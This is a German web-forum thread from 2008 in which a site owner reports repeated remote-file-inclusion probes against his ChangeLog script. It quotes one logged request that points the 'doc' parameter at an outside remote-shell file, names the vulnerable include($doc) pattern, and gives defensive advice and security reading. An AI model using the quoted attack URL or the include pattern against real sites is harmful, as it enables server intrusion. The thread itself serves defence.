Neuigkeiten:

still alive...

Hauptmenü

ChangeLog Angriff

Begonnen von Powie, 25. Januar 2008, 09:48:21

Vorheriges Thema - Nächstes Thema
Drucken
Nach unten Seiten1
Benutzer-Aktionen

Powie

25. Januar 2008, 09:48:21
Aktuell wird das ChangeLog vom pSys immer häufig angegriffen /uploads/emoticons/icon_e_smile.gif.4a0acefcb917340d2c82e5239c009e6e.gif\" alt=\":)\" />
der Request sieht genau so aus:
www.powie.de/cms/ChangeLog/index.php?doc=http://www.aneuk.com/test/oke.txt\" rel=\"external nofollow\">http://www.aneuk.com/test/oke.txt?<
Interessant wenn man sich die vermeintliche Doc mal ansieht:
http://www.aneuk.com/test/oke.txt\" rel=\"external nofollow\">http://www.aneuk.com/test/oke.txt

k00ni

#1
25. Januar 2008, 13:17:07
Kann das irgendwann mal zu Problemen führen, wo dann in ein System erfolgreich eingebrochen werden könnte?

#2
25. Januar 2008, 13:44:52
Kann das irgendwann mal zu Problemen führen, wo dann in ein System erfolgreich eingebrochen werden könnte?[/quote]
http://www.aneuk.com/test/oke.txt\" rel=\"external nofollow\">http://www.aneuk.com/test/oke.txt ist eine Remote Shell. Wenn:
- die Shell geladen werden kann
- eine der Funktionen passthru, system, popen oder shell_exec verfügbar ist
- register_globals on ist
- Short Tags erlaubt sind
kann man damit beliebige Befehle im Nutzerkontext des Users ausführen, der das Skript ausführt, ausführen.
ChangeLog ist IMHO nicht angreifbar.

Powie

#3
25. Januar 2008, 14:03:12
die Gefahr wäre gegeben bei einem Script mit den von Statler genannten Settings, welches zum Beispiel einfach einen
include($doc);
macht.
Ist nur ein Beispiel aus vielen vielen Einträgen die ich logge. Da wird bei mir auch speziell nach Mambo, Typo, etc. ähnlichen Links gesucht.

k00ni

#4
25. Januar 2008, 15:01:06
Könnt ihr gute Infoquellen empfehlen?

#5
25. Januar 2008, 15:15:55
Ist nur ein Beispiel aus vielen vielen Einträgen die ich logge. Da wird bei mir auch speziell nach Mambo, Typo, etc. ähnlichen Links gesucht.[/quote]
Es gibt noch ein paar Konstrukte mehr, die gefährlich sind. Es empfiehlt sich - neben sorgfältiger Programmierung - http://de.php.net/manual/en/ref.filesystem.php#ini.allow-url-include\" rel=\"external nofollow\">allow_url_include zu deaktivieren.
Aber nochmal: Es ist absolut notwendig, sorgfältig zu programmieren.
Könnt ihr gute Infoquellen empfehlen?[/quote]
http://www.amazon.de/PHP-Sicherheit-PHP-MySQL-Webanwendungen-sicher-programmieren/dp/3898644502/ref=sr_1_3?ie=UTF8&s=gateway&qid=1201270175&sr=8-3\" rel=\"external nofollow\">PHP-Sicherheit
http://de.php.net/manual/en/security.php\" rel=\"external nofollow\">Security
http://shiflett.org/articles\" rel=\"external nofollow\">shiflett.org
http://blog.php-security.org/\" rel=\"external nofollow\">Stefan Esser
http://www.nessus.org/nessus/\" rel=\"external nofollow\">Nessus
Drucken
Nach oben Seiten1
Benutzer-Aktionen
all your base are belong to us